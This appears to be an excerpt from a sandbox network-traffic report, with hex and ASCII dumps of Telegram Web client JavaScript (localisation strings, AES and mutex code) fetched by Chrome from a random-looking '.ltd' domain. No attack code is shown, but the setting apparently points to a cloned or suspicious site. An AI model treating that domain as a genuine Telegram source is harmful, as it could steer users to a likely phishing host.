                                  2025-01-12 00:03:45 UTC1369INData Raw: 63 68 41 6c 6c 43 68 61 74 73 53 68 6f 72 74 3a 22 43 68 61 74 73 22 2c 53 68 61 72 65 64 4d 65 64 69 61 54 61 62 32 3a 22 4d 65 64 69 61 22 2c 53 68 61 72 65 64 4c 69 6e 6b 73 54 61 62 32 3a 22 4c 69 6e 6b 73 22 2c 53 68 61 72 65 64 46 69 6c 65 73 54 61 62 32 3a 22 46 69 6c 65 73 22 2c 53 68 61 72 65 64 4d 75 73 69 63 54 61 62 32 3a 22 4d 75 73 69 63 22 2c 53 68 61 72 65 64 56 6f 69 63 65 54 61 62 32 3a 22 56 6f 69 63 65 22 2c 22 50 72 65 76 69 65 77 53 65 6e 64 65 72 2e 53 65 6e 64 50 68 6f 74 6f 22 3a 7b 6f 6e 65 56 61 6c 75 65 3a 22 53 65 6e 64 20 50 68 6f 74 6f 22 2c 6f 74 68 65 72 56 61 6c 75 65 3a 22 53 65 6e 64 20 25 64 20 50 68 6f 74 6f 73 22 7d 2c 53 65 6e 64 3a 22 53 65 6e 64 22 2c 22 50 72 65 76 69 65 77 2e 44 72 61 67 67 69 6e 67 2e 41 64 64
                                  Data Ascii: chAllChatsShort:"Chats",SharedMediaTab2:"Media",SharedLinksTab2:"Links",SharedFilesTab2:"Files",SharedMusicTab2:"Music",SharedVoiceTab2:"Voice","PreviewSender.SendPhoto":{oneValue:"Send Photo",otherValue:"Send %d Photos"},Send:"Send","Preview.Dragging.Add
                                  2025-01-12 00:03:45 UTC1369INData Raw: 75 65 3a 22 6c 61 73 74 20 73 65 65 6e 20 31 20 68 6f 75 72 20 61 67 6f 22 2c 6f 74 68 65 72 56 61 6c 75 65 3a 22 6c 61 73 74 20 73 65 65 6e 20 25 40 20 68 6f 75 72 73 20 61 67 6f 22 7d 2c 46 6f 72 77 61 72 64 65 64 4d 65 73 73 61 67 65 3a 22 46 6f 72 77 61 72 64 65 64 20 6d 65 73 73 61 67 65 22 2c 22 57 65 65 6b 64 61 79 2e 59 65 73 74 65 72 64 61 79 22 3a 22 59 65 73 74 65 72 64 61 79 22 2c 41 74 74 61 63 68 56 69 64 65 6f 3a 22 56 69 64 65 6f 22 2c 4c 61 74 65 6c 79 3a 22 6c 61 73 74 20 73 65 65 6e 20 72 65 63 65 6e 74 6c 79 22 2c 22 57 65 65 6b 64 61 79 2e 54 75 65 73 64 61 79 22 3a 22 54 75 65 73 64 61 79 22 2c 22 57 65 65 6b 64 61 79 2e 57 65 64 6e 65 73 64 61 79 22 3a 22 57 65 64 6e 65 73 64 61 79 22 2c 22 57 65 65 6b 64 61 79 2e 46 72 69 64 61 79
                                  Data Ascii: ue:"last seen 1 hour ago",otherValue:"last seen %@ hours ago"},ForwardedMessage:"Forwarded message","Weekday.Yesterday":"Yesterday",AttachVideo:"Video",Lately:"last seen recently","Weekday.Tuesday":"Tuesday","Weekday.Wednesday":"Wednesday","Weekday.Friday
                                  2025-01-12 00:03:45 UTC1369INData Raw: 5f 75 70 6c 6f 61 64 5f 76 69 64 65 6f 3a 22 75 70 6c 6f 61 64 69 6e 67 20 76 69 64 65 6f 2e 2e 2e 22 2c 6c 6e 67 5f 73 65 6e 64 5f 61 63 74 69 6f 6e 5f 72 65 63 6f 72 64 5f 61 75 64 69 6f 3a 22 72 65 63 6f 72 64 69 6e 67 20 61 75 64 69 6f 2e 2e 2e 22 2c 6c 6e 67 5f 73 65 6e 64 5f 61 63 74 69 6f 6e 5f 75 70 6c 6f 61 64 5f 61 75 64 69 6f 3a 22 75 70 6c 6f 61 64 69 6e 67 20 61 75 64 69 6f 2e 2e 2e 22 2c 6c 6e 67 5f 73 65 6e 64 5f 61 63 74 69 6f 6e 5f 75 70 6c 6f 61 64 5f 70 68 6f 74 6f 3a 22 75 70 6c 6f 61 64 69 6e 67 20 70 68 6f 74 6f 2e 2e 2e 22 2c 6c 6e 67 5f 73 65 6e 64 5f 61 63 74 69 6f 6e 5f 75 70 6c 6f 61 64 5f 66 69 6c 65 3a 22 75 70 6c 6f 61 64 69 6e 67 20 66 69 6c 65 2e 2e 2e 22 2c 43 72 6f 70 49 6d 61 67 65 3a 22 43 72 6f 70 20 69 6d 61 67 65 22
                                  Data Ascii: _upload_video:"uploading video...",lng_send_action_record_audio:"recording audio...",lng_send_action_upload_audio:"uploading audio...",lng_send_action_upload_photo:"uploading photo...",lng_send_action_upload_file:"uploading file...",CropImage:"Crop image"
                                  2025-01-12 00:03:45 UTC1369INData Raw: 7b 6f 6e 65 56 61 6c 75 65 3a 22 25 31 24 64 20 6d 65 6d 62 65 72 22 2c 6f 74 68 65 72 56 61 6c 75 65 3a 22 25 31 24 64 20 6d 65 6d 62 65 72 73 22 7d 2c 47 65 6e 65 72 61 6c 3a 22 47 65 6e 65 72 61 6c 22 2c 6c 6e 67 5f 73 65 74 74 69 6e 67 73 5f 73 65 6e 64 5f 65 6e 74 65 72 3a 22 53 65 6e 64 20 77 69 74 68 20 45 6e 74 65 72 22 2c 6c 6e 67 5f 73 65 74 74 69 6e 67 73 5f 73 65 6e 64 5f 63 6d 64 65 6e 74 65 72 3a 22 53 65 6e 64 20 77 69 74 68 20 43 6d 64 2b 45 6e 74 65 72 22 2c 54 65 78 74 53 69 7a 65 3a 22 4d 65 73 73 61 67 65 20 54 65 78 74 20 53 69 7a 65 22 2c 43 68 61 74 42 61 63 6b 67 72 6f 75 6e 64 3a 22 43 68 61 74 20 42 61 63 6b 67 72 6f 75 6e 64 22 2c 22 56 6f 69 63 65 4f 76 65 72 2e 4b 65 79 62 6f 61 72 64 22 3a 22 4b 65 79 62 6f 61 72 64 22 2c 41
                                  Data Ascii: {oneValue:"%1$d member",otherValue:"%1$d members"},General:"General",lng_settings_send_enter:"Send with Enter",lng_settings_send_cmdenter:"Send with Cmd+Enter",TextSize:"Message Text Size",ChatBackground:"Chat Background","VoiceOver.Keyboard":"Keyboard",A
                                  2025-01-12 00:03:45 UTC1369INData Raw: 50 72 6f 66 69 6c 65 50 68 6f 74 6f 54 69 74 6c 65 3a 22 57 68 6f 20 63 61 6e 20 73 65 65 20 6d 79 20 70 72 6f 66 69 6c 65 20 70 68 6f 74 6f 73 20 26 20 76 69 64 65 6f 73 3f 22 2c 50 72 69 76 61 63 79 46 6f 72 77 61 72 64 73 54 69 74 6c 65 3a 22 57 68 6f 20 63 61 6e 20 61 64 64 20 61 20 6c 69 6e 6b 20 74 6f 20 6d 79 20 61 63 63 6f 75 6e 74 20 77 68 65 6e 20 66 6f 72 77 61 72 64 69 6e 67 20 6d 79 20 6d 65 73 73 61 67 65 73 3f 22 2c 57 68 6f 43 61 6e 41 64 64 4d 65 3a 22 57 68 6f 20 63 61 6e 20 61 64 64 20 6d 65 20 74 6f 20 67 72 6f 75 70 20 63 68 61 74 73 3f 22 2c 6c 6e 67 5f 73 65 74 74 69 6e 67 73 5f 73 65 6e 73 69 74 69 76 65 5f 74 69 74 6c 65 3a 22 53 65 6e 73 69 74 69 76 65 20 63 6f 6e 74 65 6e 74 22 2c 6c 6e 67 5f 73 65 74 74 69 6e 67 73 5f 73 65 6e
                                  Data Ascii: ProfilePhotoTitle:"Who can see my profile photos & videos?",PrivacyForwardsTitle:"Who can add a link to my account when forwarding my messages?",WhoCanAddMe:"Who can add me to group chats?",lng_settings_sensitive_title:"Sensitive content",lng_settings_sen
                                  2025-01-12 00:03:45 UTC1369INData Raw: 57 69 74 68 54 69 74 6c 65 3a 22 4e 65 76 65 72 20 53 68 61 72 65 22 2c 22 50 72 69 76 61 63 79 2e 50 72 6f 66 69 6c 65 50 68 6f 74 6f 22 3a 22 50 72 6f 66 69 6c 65 20 50 68 6f 74 6f 22 2c 46 69 6c 74 65 72 4e 6f 43 68 61 74 73 54 6f 44 69 73 70 6c 61 79 3a 22 46 6f 6c 64 65 72 20 69 73 20 65 6d 70 74 79 22 2c 41 74 74 61 63 68 53 74 69 63 6b 65 72 3a 22 53 74 69 63 6b 65 72 22 2c 22 43 68 61 74 4c 69 73 74 2e 53 65 61 72 63 68 2e 53 68 6f 77 4d 6f 72 65 22 3a 22 53 68 6f 77 20 6d 6f 72 65 22 2c 22 44 69 61 6c 6f 67 4c 69 73 74 2e 53 65 61 72 63 68 53 65 63 74 69 6f 6e 44 69 61 6c 6f 67 73 22 3a 22 43 68 61 74 73 20 61 6e 64 20 43 6f 6e 74 61 63 74 73 22 2c 53 65 61 72 63 68 4d 65 73 73 61 67 65 73 3a 22 4d 65 73 73 61 67 65 73 22 2c 22 57 65 65 6b 64 61
                                  Data Ascii: WithTitle:"Never Share","Privacy.ProfilePhoto":"Profile Photo",FilterNoChatsToDisplay:"Folder is empty",AttachSticker:"Sticker","ChatList.Search.ShowMore":"Show more","DialogList.SearchSectionDialogs":"Chats and Contacts",SearchMessages:"Messages","Weekda
                                  2025-01-12 00:03:45 UTC1369INData Raw: 72 64 3a 22 46 6f 72 77 61 72 64 22 2c 22 43 6f 6d 6d 6f 6e 2e 53 65 6c 65 63 74 22 3a 22 53 65 6c 65 63 74 22 2c 44 65 6c 65 74 65 53 69 6e 67 6c 65 4d 65 73 73 61 67 65 73 54 69 74 6c 65 3a 22 44 65 6c 65 74 65 20 6d 65 73 73 61 67 65 22 2c 41 72 65 59 6f 75 53 75 72 65 44 65 6c 65 74 65 53 69 6e 67 6c 65 4d 65 73 73 61 67 65 3a 22 41 72 65 20 79 6f 75 20 73 75 72 65 20 79 6f 75 20 77 61 6e 74 20 74 6f 20 64 65 6c 65 74 65 20 74 68 69 73 20 6d 65 73 73 61 67 65 3f 22 2c 50 69 6e 4d 65 73 73 61 67 65 41 6c 65 72 74 54 69 74 6c 65 3a 22 50 69 6e 20 6d 65 73 73 61 67 65 22 2c 50 69 6e 4d 65 73 73 61 67 65 41 6c 65 72 74 43 68 61 74 3a 22 44 6f 20 79 6f 75 20 77 61 6e 74 20 74 6f 20 70 69 6e 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 74 20 74 68 65 20 74
                                  Data Ascii: rd:"Forward","Common.Select":"Select",DeleteSingleMessagesTitle:"Delete message",AreYouSureDeleteSingleMessage:"Are you sure you want to delete this message?",PinMessageAlertTitle:"Pin message",PinMessageAlertChat:"Do you want to pin this message at the t
                                  2025-01-12 00:03:45 UTC1369INData Raw: 22 2c 45 6e 74 65 72 43 68 61 6e 6e 65 6c 4e 61 6d 65 3a 22 43 68 61 6e 6e 65 6c 20 6e 61 6d 65 22 2c 44 65 73 63 72 69 70 74 69 6f 6e 50 6c 61 63 65 68 6f 6c 64 65 72 3a 22 44 65 73 63 72 69 70 74 69 6f 6e 22 2c 43 68 61 6e 6e 65 6c 54 79 70 65 3a 22 43 68 61 6e 6e 65 6c 20 54 79 70 65 22 2c 54 79 70 65 50 75 62 6c 69 63 3a 22 50 75 62 6c 69 63 22 2c 44 69 73 63 75 73 73 69 6f 6e 3a 22 44 69 73 63 75 73 73 69 6f 6e 22 2c 44 69 73 63 75 73 73 69 6f 6e 55 6e 6c 69 6e 6b 3a 22 55 6e 6c 69 6e 6b 22 2c 43 68 61 6e 6e 65 6c 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 3a 22 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 2c 43 68 61 6e 6e 65 6c 53 69 67 6e 4d 65 73 73 61 67 65 73 3a 22 53 69 67 6e 20 4d 65 73 73 61 67 65 73 22 2c 43 68 61 6e 6e 65 6c 44 65 6c 65 74
                                  Data Ascii: ",EnterChannelName:"Channel name",DescriptionPlaceholder:"Description",ChannelType:"Channel Type",TypePublic:"Public",Discussion:"Discussion",DiscussionUnlink:"Unlink",ChannelAdministrators:"Administrators",ChannelSignMessages:"Sign Messages",ChannelDelet


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  26192.168.2.649800172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:45 UTC445OUTGET /5648.343cae73c4dc2e71af86.js HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: script
                                  Referer: https://wkybcnfuqpgjx.ltd/3559.80b270ba0e217557b392.js
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:45 UTC922INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:45 GMT
                                  Content-Type: application/javascript
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  Vary: Accept-Encoding
                                  ETag: W/"674840af-11d9e"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 6951
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OMG7N49AvwzrL3Jhtou6GJ6vautG75ljEQI9VGR%2FZyknDt1JWx09ZmNdrwQPXgsXbMhiHwxfAUyjIt6JyvE2xZ6yVuQZpSuNOwHc5%2B2bxcNivmOt9J8nRYmJCTqPqc4CYbGGgg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2a40fab41af-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1703&rtt_var=643&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1023&delivery_rate=1696687&cwnd=224&unsent_bytes=0&cid=9d5c31004fcc2c15&ts=137&x=0"
                                  2025-01-12 00:03:45 UTC447INData Raw: 37 63 64 64 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 35 36 34 38 2e 33 34 33 63 61 65 37 33 63 34 64 63 32 65 37 31 61 66 38 36 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 74 65 6c 65 67 72 61 6d 5f 74 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 74 65 6c 65 67 72 61 6d 5f 74 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 36 34 38 5d 2c 7b 37 36 39 32 3a 28 74 2c 65 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 72 28 65 29 2c 72 2e 64 28 65 2c 7b 43 54 52 3a 28 29 3d 3e 64 2c 49 47 45 3a 28 29 3d 3e 76 2c 64 65 66 61 75 6c 74 3a 28 29 3d 3e 77 7d 29 3b 76 61 72 20 6e 3d 6e 65 77 20 55 69
                                  Data Ascii: 7cdd/*! For license information please see 5648.343cae73c4dc2e71af86.js.LICENSE.txt */(self.webpackChunktelegram_t=self.webpackChunktelegram_t||[]).push([[5648],{7692:(t,e,r)=>{"use strict";r.r(e),r.d(e,{CTR:()=>d,IGE:()=>v,default:()=>w});var n=new Ui
                                  2025-01-12 00:03:45 UTC1369INData Raw: 32 35 36 29 2c 6c 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 32 35 36 29 3b 66 75 6e 63 74 69 6f 6e 20 68 28 74 29 7b 69 66 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 33 32 41 72 72 61 79 29 72 65 74 75 72 6e 20 74 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 29 7b 69 66 28 74 2e 6c 65 6e 67 74 68 25 34 21 3d 30 29 66 6f 72 28 76 61 72 20 65 3d 74 2e 6c 65 6e 67 74 68 25 34 3b 65 3c 3d 34 3b 65 2b 2b 29 74 2b 3d 22 5c 30 78 30 30 22 3b 76 61 72 20 72 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 74 2e 6c 65 6e 67 74 68 2f 34 29 3b 66 6f 72 28 65 3d 30 3b 65 3c 74 2e 6c 65 6e 67 74 68 3b 65 2b 3d 34 29 72 5b 65 2f 34 5d 3d 28 6f 3d 65 2c 28 6e 3d 74 29 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 3c 3c 32 34 5e 6e
                                  Data Ascii: 256),l=new Uint32Array(256);function h(t){if(t instanceof Uint32Array)return t;if("string"==typeof t){if(t.length%4!=0)for(var e=t.length%4;e<=4;e++)t+="\0x00";var r=new Uint32Array(t.length/4);for(e=0;e<t.length;e+=4)r[e/4]=(o=e,(n=t).charCodeAt(o)<<24^n
                                  2025-01-12 00:03:45 UTC1369INData Raw: 29 26 26 28 72 3d 6e 5b 72 3e 3e 3e 32 34 5d 3c 3c 32 34 5e 6e 5b 72 3e 3e 31 36 26 32 35 35 5d 3c 3c 31 36 5e 6e 5b 72 3e 3e 38 26 32 35 35 5d 3c 3c 38 5e 6e 5b 32 35 35 26 72 5d 2c 69 25 65 2e 6c 65 6e 67 74 68 3d 3d 30 26 26 28 72 3d 72 3c 3c 38 5e 72 3e 3e 3e 32 34 5e 6f 3c 3c 32 34 2c 6f 3d 6f 3c 3c 31 5e 32 38 33 2a 28 6f 3e 3e 37 29 29 29 2c 74 68 69 73 2e 65 6e 63 4b 65 79 5b 69 5d 3d 74 68 69 73 2e 65 6e 63 4b 65 79 5b 69 2d 65 2e 6c 65 6e 67 74 68 5d 5e 72 3b 66 6f 72 28 76 61 72 20 75 3d 30 3b 69 3b 75 2b 2b 2c 69 2d 2d 29 72 3d 74 68 69 73 2e 65 6e 63 4b 65 79 5b 33 26 75 3f 69 3a 69 2d 34 5d 2c 74 68 69 73 2e 64 65 63 4b 65 79 5b 75 5d 3d 69 3c 3d 34 7c 7c 75 3c 34 3f 72 3a 66 5b 6e 5b 72 3e 3e 3e 32 34 5d 5d 5e 63 5b 6e 5b 72 3e 3e 31 36 26
                                  Data Ascii: )&&(r=n[r>>>24]<<24^n[r>>16&255]<<16^n[r>>8&255]<<8^n[255&r],i%e.length==0&&(r=r<<8^r>>>24^o<<24,o=o<<1^283*(o>>7))),this.encKey[i]=this.encKey[i-e.length]^r;for(var u=0;i;u++,i--)r=this.encKey[3&u?i:i-4],this.decKey[u]=i<=4||u<4?r:f[n[r>>>24]]^c[n[r>>16&
                                  2025-01-12 00:03:45 UTC1369INData Raw: 3b 77 2b 2b 29 75 5b 33 26 2d 77 5d 3d 6f 5b 73 3e 3e 3e 32 34 5d 3c 3c 32 34 5e 6f 5b 61 3e 3e 31 36 26 32 35 35 5d 3c 3c 31 36 5e 6f 5b 79 3e 3e 38 26 32 35 35 5d 3c 3c 38 5e 6f 5b 32 35 35 26 67 5d 5e 74 68 69 73 2e 64 65 63 4b 65 79 5b 64 2b 2b 5d 2c 65 3d 73 2c 73 3d 61 2c 61 3d 79 2c 79 3d 67 2c 67 3d 65 3b 72 65 74 75 72 6e 20 75 7d 2c 74 7d 28 29 2c 76 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 2c 72 29 7b 76 6f 69 64 20 30 3d 3d 3d 72 26 26 28 72 3d 31 36 29 2c 74 68 69 73 2e 6b 65 79 3d 68 28 74 29 2c 74 68 69 73 2e 69 76 3d 68 28 65 29 2c 74 68 69 73 2e 63 69 70 68 65 72 3d 6e 65 77 20 67 28 74 29 2c 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 3d 72 2f 34 7d 72 65 74 75 72 6e 20 74 2e 70 72 6f 74 6f 74 79 70 65
                                  Data Ascii: ;w++)u[3&-w]=o[s>>>24]<<24^o[a>>16&255]<<16^o[y>>8&255]<<8^o[255&g]^this.decKey[d++],e=s,s=a,a=y,y=g,g=e;return u},t}(),v=function(){function t(t,e,r){void 0===r&&(r=16),this.key=h(t),this.iv=h(e),this.cipher=new g(t),this.blockSize=r/4}return t.prototype
                                  2025-01-12 00:03:45 UTC1369INData Raw: 2e 62 6c 6f 63 6b 53 69 7a 65 29 7b 66 6f 72 28 76 61 72 20 75 3d 74 68 69 73 2e 63 69 70 68 65 72 2e 65 6e 63 72 79 70 74 28 74 68 69 73 2e 63 6f 75 6e 74 65 72 29 2c 73 3d 69 2c 61 3d 6f 3b 73 3c 72 2e 6c 65 6e 67 74 68 26 26 61 3c 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 3b 73 2b 2b 2c 61 2b 2b 29 6e 5b 73 5d 3d 75 5b 61 5d 5e 72 5b 73 5d 3b 72 2e 6c 65 6e 67 74 68 2d 69 3e 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 26 26 74 68 69 73 2e 69 6e 63 72 65 6d 65 6e 74 43 6f 75 6e 74 65 72 28 29 2c 6f 26 26 28 69 2d 3d 6f 2c 6f 3d 30 29 7d 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 66 66 73 65 74 3d 28 74 68 69 73 2e 6f 66 66 73 65 74 2b 72 2e 6c 65 6e 67 74 68 25 34 29 25 34 2c 6e 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 63 72 79 70 74 3d 66 75 6e 63
                                  Data Ascii: .blockSize){for(var u=this.cipher.encrypt(this.counter),s=i,a=o;s<r.length&&a<this.blockSize;s++,a++)n[s]=u[a]^r[s];r.length-i>=this.blockSize&&this.incrementCounter(),o&&(i-=o,o=0)}return this.offset=(this.offset+r.length%4)%4,n},t.prototype.decrypt=func
                                  2025-01-12 00:03:45 UTC1369INData Raw: 76 61 72 20 6e 3d 72 28 31 36 33 35 29 2c 6f 3d 72 28 34 35 38 36 29 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 29 7b 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 6f 2e 45 5f 43 41 4e 43 45 4c 45 44 29 2c 74 68 69 73 2e 5f 76 61 6c 75 65 3d 74 2c 74 68 69 73 2e 5f 63 61 6e 63 65 6c 45 72 72 6f 72 3d 65 2c 74 68 69 73 2e 5f 71 75 65 75 65 3d 5b 5d 2c 74 68 69 73 2e 5f 77 65 69 67 68 74 65 64 57 61 69 74 65 72 73 3d 5b 5d 7d 72 65 74 75 72 6e 20 74 2e 70 72 6f 74 6f 74 79 70 65 2e 61 63 71 75 69 72 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3d 74 68 69 73 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 31 29 2c 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 30 29 2c 74 3c 3d 30 29 74 68 72
                                  Data Ascii: var n=r(1635),o=r(4586),i=function(){function t(t,e){void 0===e&&(e=o.E_CANCELED),this._value=t,this._cancelError=e,this._queue=[],this._weightedWaiters=[]}return t.prototype.acquire=function(t,e){var r=this;if(void 0===t&&(t=1),void 0===e&&(e=0),t<=0)thr
                                  2025-01-12 00:03:45 UTC1369INData Raw: 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 76 61 6c 75 65 3c 3d 30 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 56 61 6c 75 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 76 61 6c 75 65 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 56 61 6c 75 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 5f 76 61 6c 75 65 3d 74 2c 74 68 69 73 2e 5f 64 69 73 70 61 74 63 68 51 75 65 75 65 28 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 6c 65 61 73 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 31 29 2c 74 3c 3d 30 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 20 77 65 69 67 68 74 20 22 2e 63 6f 6e 63 61 74 28 74 2c 22 3a 20 6d 75 73
                                  Data Ascii: (){return this._value<=0},t.prototype.getValue=function(){return this._value},t.prototype.setValue=function(t){this._value=t,this._dispatchQueue()},t.prototype.release=function(t){if(void 0===t&&(t=1),t<=0)throw new Error("invalid weight ".concat(t,": mus
                                  2025-01-12 00:03:45 UTC1369INData Raw: 71 75 65 75 65 5b 30 5d 2e 70 72 69 6f 72 69 74 79 3c 65 29 26 26 74 3c 3d 74 68 69 73 2e 5f 76 61 6c 75 65 7d 2c 74 7d 28 29 3b 66 75 6e 63 74 69 6f 6e 20 75 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 72 3e 3d 30 3b 72 2d 2d 29 69 66 28 65 28 74 5b 72 5d 29 29 72 65 74 75 72 6e 20 72 3b 72 65 74 75 72 6e 2d 31 7d 65 2e 64 65 66 61 75 6c 74 3d 69 7d 2c 34 35 38 36 3a 28 74 2c 65 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 65 2e 45 5f 43 41 4e 43 45 4c 45 44 3d 65 2e 45 5f 41 4c 52 45 41 44 59 5f 4c 4f 43 4b 45 44 3d 65 2e 45 5f 54 49 4d 45 4f 55 54 3d 76 6f 69 64 20
                                  Data Ascii: queue[0].priority<e)&&t<=this._value},t}();function u(t,e){for(var r=t.length-1;r>=0;r--)if(e(t[r]))return r;return-1}e.default=i},4586:(t,e)=>{"use strict";Object.defineProperty(e,"__esModule",{value:!0}),e.E_CANCELED=e.E_ALREADY_LOCKED=e.E_TIMEOUT=void
                                  2025-01-12 00:03:45 UTC1369INData Raw: 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 74 2e 67 65 74 56 61 6c 75 65 7d 65 2e 77 69 74 68 54 69 6d 65 6f 75 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 76 61 72 20 75 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 72 26 26 28 72 3d 6f 2e 45 5f 54 49 4d 45 4f 55 54 29 2c 7b 61 63 71 75 69 72 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 2c 73 29 7b 76 61 72 20 61 3b 69 66 28 69 28 74 29 3f 61 3d 6f 3a 28 61 3d 76 6f 69 64 20 30 2c 73 3d 6f 29 2c 76 6f 69 64 20 30 21 3d 3d 61 26 26 61 3c 3d 30 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 20 77 65 69 67 68 74 20 22 2e 63 6f 6e 63 61 74 28 61 2c 22 3a 20 6d 75 73 74 20 62 65 20 70 6f 73 69 74 69 76 65 22 29 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d
                                  Data Ascii: turn void 0!==t.getValue}e.withTimeout=function(t,e,r){var u=this;return void 0===r&&(r=o.E_TIMEOUT),{acquire:function(o,s){var a;if(i(t)?a=o:(a=void 0,s=o),void 0!==a&&a<=0)throw new Error("invalid weight ".concat(a,": must be positive"));return new Prom
                                  2025-01-12 00:03:45 UTC1369INData Raw: 65 28 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 76 61 72 20 61 3d 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 28 72 29 7d 29 2c 65 29 3b 28 69 28 74 29 3f 74 2e 77 61 69 74 46 6f 72 55 6e 6c 6f 63 6b 28 75 2c 6f 29 3a 74 2e 77 61 69 74 46 6f 72 55 6e 6c 6f 63 6b 28 6f 29 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 61 29 2c 6e 28 29 7d 29 29 7d 29 29 7d 2c 69 73 4c 6f 63 6b 65 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 69 73 4c 6f 63 6b 65 64 28 29 7d 2c 67 65 74 56 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 67 65 74 56 61 6c 75 65 28 29 7d 2c 73 65 74 56 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65
                                  Data Ascii: e((function(n,s){var a=setTimeout((function(){return s(r)}),e);(i(t)?t.waitForUnlock(u,o):t.waitForUnlock(o)).then((function(){clearTimeout(a),n()}))}))},isLocked:function(){return t.isLocked()},getValue:function(){return t.getValue()},setValue:function(e


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  27192.168.2.649799172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:45 UTC369OUTGET /3559.80b270ba0e217557b392.js HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
